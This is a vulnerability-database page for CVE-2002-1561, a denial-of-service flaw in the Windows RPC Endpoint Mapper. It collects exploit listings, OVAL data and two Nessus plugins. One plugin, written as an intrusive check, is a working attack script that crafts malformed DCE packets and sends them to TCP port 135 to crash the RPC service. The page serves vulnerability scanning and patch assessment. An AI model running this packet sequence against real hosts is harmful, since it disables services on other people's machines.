Vulnerabilities > CVE-2002-1561 - Unspecified vulnerability in Microsoft products
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 45 |
Exploit-Db
description Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4). CVE-2002-1561. Dos exploit for windows platform id EDB-ID:21954 last seen 2016-02-02 modified 2002-10-18 published 2002-10-18 reporter anonymous source https://www.exploit-db.com/download/21954/ title Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 4 description Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3). CVE-2002-1561. Dos exploit for windows platform id EDB-ID:21953 last seen 2016-02-02 modified 2002-10-18 published 2002-10-18 reporter Rapid7 source https://www.exploit-db.com/download/21953/ title Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 3 description Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2). CVE-2002-1561. Dos exploit for windows platform id EDB-ID:21952 last seen 2016-02-02 modified 2002-10-22 published 2002-10-22 reporter Trancer source https://www.exploit-db.com/download/21952/ title Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 2 description Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1). CVE-2002-1561. Dos exploit for windows platform id EDB-ID:21951 last seen 2016-02-02 modified 2002-10-22 published 2002-10-22 reporter lion source https://www.exploit-db.com/download/21951/ title Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 1
Nessus
NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS03-010.NASL description A flaw exists in the RPC endpoint mapper that can be used by an attacker to disable it remotely. last seen 2020-06-01 modified 2020-06-02 plugin id 11485 published 2003-03-26 reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/11485 title MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(11485); script_version("1.46"); script_cvs_date("Date: 2018/11/15 20:50:29"); script_cve_id("CVE-2002-1561"); script_bugtraq_id(6005); script_xref(name:"MSFT", value:"MS03-010"); script_xref(name:"CERT", value:"261537"); script_xref(name:"MSKB", value:"331953"); script_name(english:"MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)"); script_summary(english:"Checks SP version"); script_set_attribute(attribute:"synopsis", value:"It is possible to disable the remote RPC service."); script_set_attribute(attribute:"description", value: "A flaw exists in the RPC endpoint mapper that can be used by an attacker to disable it remotely."); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010"); script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for the Windows 2000 and XP."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2002/10/18"); script_set_attribute(attribute:"patch_publication_date", value:"2003/03/26"); script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/26"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc."); script_family(english:"Windows : Microsoft Bulletins"); script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl"); script_require_keys("SMB/MS_Bulletin_Checks/Possible"); script_require_ports(139, 445, 'Host/patch_management_checks'); exit(0); } include("audit.inc"); include("smb_func.inc"); include("smb_hotfixes.inc"); include("smb_hotfixes_fcheck.inc"); include("misc_func.inc"); get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible"); bulletin = 'MS03-010'; kb = "331953"; kbs = make_list(kb); if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING); get_kb_item_or_exit("SMB/Registry/Enumerated"); get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1); if (hotfix_check_sp_range(nt:'6', win2k:'2,3', xp:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN); rootfile = hotfix_get_systemroot(); if (!rootfile) exit(1, "Failed to get the system root."); share = hotfix_path2share(path:rootfile); if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share); if ( hotfix_is_vulnerable(os:"5.1", sp:1, file:"Rpcrt4.dll", version:"5.1.2600.1140", dir:"\system32", bulletin:bulletin, kb:kb) || hotfix_is_vulnerable(os:"5.1", sp:0, file:"Rpcrt4.dll", version:"5.1.2600.105", dir:"\system32", bulletin:bulletin, kb:kb) || hotfix_is_vulnerable(os:"5.0", file:"Rpcrt4.dll", version:"5.0.2195.6106", dir:"\system32", bulletin:bulletin, kb:kb) || hotfix_is_vulnerable(os:"4.0", file:"Rpcrt4.dll", version:"5.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb) ) { set_kb_item(name:"SMB/Missing/"+bulletin, value:TRUE); hotfix_security_warning(); hotfix_check_fversion_end(); exit(0); } else { hotfix_check_fversion_end(); audit(AUDIT_HOST_NOT, 'affected'); }NASL family Windows NASL id MSRPC-SPIKE27.NASL description MS Windows RPC service (RPCSS) crashes trying to dereference a NULL pointer when it receives a certain malformed request. All MS RPC-based services (i.e. a large part of MS Windows 2000+) running on the target machine are rendered inoperable. last seen 2020-06-01 modified 2020-06-02 plugin id 11159 published 2002-11-21 reporter This script is Copyright (C) 2002-2018 Pavel Kankovsky source https://www.tenable.com/plugins/nessus/11159 title MS03-010: Microsoft Windows RPC Endpoint Manager Malformed Packet DoS (331953) (intrusive check) code # # Test "Spike 2.7" MS RPC Services NULL pointer reference DoS # # Copyright (c) 2002 Pavel Kankovsky, DCIT s.r.o. <[email protected]> # Permission to copy, modify, and redistribute this script under # the terms of the GNU General Public License is hereby granted. # # This script is based on an exploit published on BugTraq: # Code by lion, Welcomde to HUC Website Http://www.cnhonker.com # 2002/10/22 # # Changes by Tenable: # - Revised plugin title, added 'see also' (6/24/09) # - Changed family (6/25/09) # - Revised plugin title, changed family again (10/23/09) # - Add MSKB script_xref (8/29/17) include("compat.inc"); if (description) { script_id(11159); script_version("1.30"); script_cvs_date("Date: 2018/11/15 20:50:27"); script_cve_id("CVE-2002-1561"); script_bugtraq_id(6005); script_xref(name:"MSFT", value:"MS03-010"); script_xref(name:"MSKB", value:"331953"); script_name(english:"MS03-010: Microsoft Windows RPC Endpoint Manager Malformed Packet DoS (331953) (intrusive check)"); script_summary(english:"Attempts to crash MS RPC service the Spike 2.7-way"); script_set_attribute(attribute:"synopsis", value: "The remote Windows host is affected by a denial of service vulnerability."); script_set_attribute(attribute:"description", value: "MS Windows RPC service (RPCSS) crashes trying to dereference a NULL pointer when it receives a certain malformed request. All MS RPC-based services (i.e. a large part of MS Windows 2000+) running on the target machine are rendered inoperable."); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010"); script_set_attribute(attribute:"solution", value:"Apply the patch referenced in the Microsoft bulletin."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2002/10/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2002/11/21"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows"); script_end_attributes(); script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright(english:"This script is Copyright (C) 2002-2018 Pavel Kankovsky"); script_family(english:"Windows"); script_dependencie("find_service1.nasl"); script_require_keys("Settings/ParanoidReport"); script_require_ports(135); exit(0); } include("audit.inc"); include("global_settings.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); # # Prepare DCE BIND request # function dce_bind() { local_var req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers; # Service UUID: # B9E79E60-3D52-11CE-AAA1-00006901293F # (this is one of the services bound to port 135) sv_uuid = raw_string( 0x60, 0x9E, 0xE7, 0xB9, 0x52, 0x3D, 0xCE, 0x11, 0xAA, 0xA1, 0x00, 0x00, 0x69, 0x01, 0x29, 0x3F); # The version is incorrect "for extra fun" (should be 0.2) sv_vers = raw_string(0x02, 0x00, 0x02, 0x00); # Transfer syntar UUID: # 8A885D04-1CEB-11C9-9FE8-08002B104860 ts_uuid = raw_string( 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60); ts_vers = raw_string(0x02, 0x00, 0x00, 0x00); # Request header req_hdr = raw_string( 0x05, 0x00, # version, minor version 0x0b, 0x03, # BINDPACKET, flags (1st+last frag) 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp) 0x48, 0x00, # fragment length (72) 0x00, 0x00, # auth length 0x02, 0x00, 0x00, 0x00, # call id 0xd0, 0x16, 0xd0, 0x16, # max xmit frag, max recv frag 0x00, 0x00, 0x00, 0x00, # assoc group 0x01, # num ctx items 0x00, 0x00, 0x00, # (padding) 0x00, 0x00, # p_cont_id 0x01, # n_transfer_syn 0x00); # (padding) return (string( req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers)); } # # Prepare evil DCE request I # function attack_dce_req_1() { local_var req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6, req_hdr; # Request header req_hdr = raw_string( 0x05, 0x00, # version, minor version 0x00, 0x01, # REQUESTPACKET, flags (1st frag) 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp) 0xd0, 0x16, # fragment length (5840) 0x00, 0x00, # auth length 0x8f, 0x00, 0x00, 0x00, # call id 0x20, 0x27, 0x01, 0x00, # alloc hint 0x00, 0x00, # context id 0x02, 0x00, # opnum: 0 0xf0, 0x00, 0x00, 0x00, # ? 0x00, 0x00, 0x00, 0x00, # ? 0x0f, 0x00, 0x00, 0x00); # ? req_dt1 = crap(data:raw_string(0x41), length:240); req_dt2 = raw_string( 0x88, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x13, 0x00, 0x00); req_dt3 = crap(data:raw_string(0x42), length:5000); req_dt4 = raw_string( 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00); req_dt5 = crap(data:raw_string(0x43), length:512); req_dt6 = raw_string( 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0xff, 0x00, 0x00, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d); return (string( req_hdr, req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6)); } # # Prepare evil DCE request II # the size does not match fragment length?! # function attack_dce_req_2(ah, stuff) { local_var ah0, ah1, ah2, ah3, req_dt1, req_hdr; # grrr...nasl barfs on (ah/xx) & 0xff ah0 = ah & 0xff; ah1 = ah / 256; ah1 = ah1 & 0xff; ah2 = ah / 65536; ah2 = ah2 & 0xff; ah3 = ah / 16777216; ah3 = ah3 & 0xff; # Request header req_hdr = raw_string( 0x05, 0x00, # version, minor version 0x00, 0x00, # REQUESTPACKET, flags (none) 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp) 0xd0, 0x16, # fragment length (5840...hmmm) 0x00, 0x00, # auth length 0x8f, 0x00, 0x00, 0x00, # call id ah0, ah1, ah2, ah3, # alloc hint 0x00, 0x00, # context id 0x02, 0x00); # opnum: ? req_dt1 = crap(data:raw_string(stuff), length:5000); return (string(req_hdr, req_dt1)); } # # Prepare evil DCE request III # this makes absolutely no sense, hmm... # the attack appears to work without it... # function attack_dce_req_3() { local_var req_dt1, req_hdr; # Request header? eh...sort of req_hdr = raw_string( 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x00, 0x00); req_dt1 = crap(data:raw_string(0x48), length:5000); return (string(req_hdr, req_dt1)); } # # Carry out the attack. # function attack(port) { local_var i, r, soc; # connect soc = NULL; for (i = 0; i < 3 && ! soc; i ++) { sleep(i); soc = open_sock_tcp(port); } if (!soc) return (1); # send bind request and check whether we got some reply # this is used as a liveness test send(socket:soc, data:dce_bind()); r = recv(socket:soc, length:16); if (strlen(r) < 16) return (1); # send the evil packets send(socket:soc, data:attack_dce_req_1()); send(socket:soc, data:attack_dce_req_2(ah:0x011050, stuff:0x44)); send(socket:soc, data:attack_dce_req_2(ah:0xf980, stuff:0x45)); send(socket:soc, data:attack_dce_req_2(ah:0xe2b0, stuff:0x46)); send(socket:soc, data:attack_dce_req_2(ah:0x1560, stuff:0x47)); send(socket:soc, data:attack_dce_req_3()); # see you! close(soc); return (0); } # # The main program. # port = 135; if (!get_port_state(port)) { exit(0); } maxtries = 5; countdown = maxtries; while (countdown > 0) { success = attack(port:port); if (success) { if (countdown == maxtries) { # XXX it refuses to talk to us # XXX should we print a warning? exit(0); } security_warning(port); exit(0); } countdown = countdown - 1; sleep(1); }
Oval
| accepted | 2011-05-16T04:03:14.116-04:00 | ||||||||||||||||||||
| class | vulnerability | ||||||||||||||||||||
| contributors |
| ||||||||||||||||||||
| description | The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. | ||||||||||||||||||||
| family | windows | ||||||||||||||||||||
| id | oval:org.mitre.oval:def:59 | ||||||||||||||||||||
| status | accepted | ||||||||||||||||||||
| submitted | 2003-10-10T12:00:00.000-04:00 | ||||||||||||||||||||
| title | Microsoft Windows RPC Denial of Service | ||||||||||||||||||||
| version | 70 |
References
- http://www.securityfocus.com/archive/1/296114/2002-10-14/2002-10-20/0
- http://www.securityfocus.com/bid/6005
- http://www.kb.cert.org/vuls/id/261537
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A59
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-010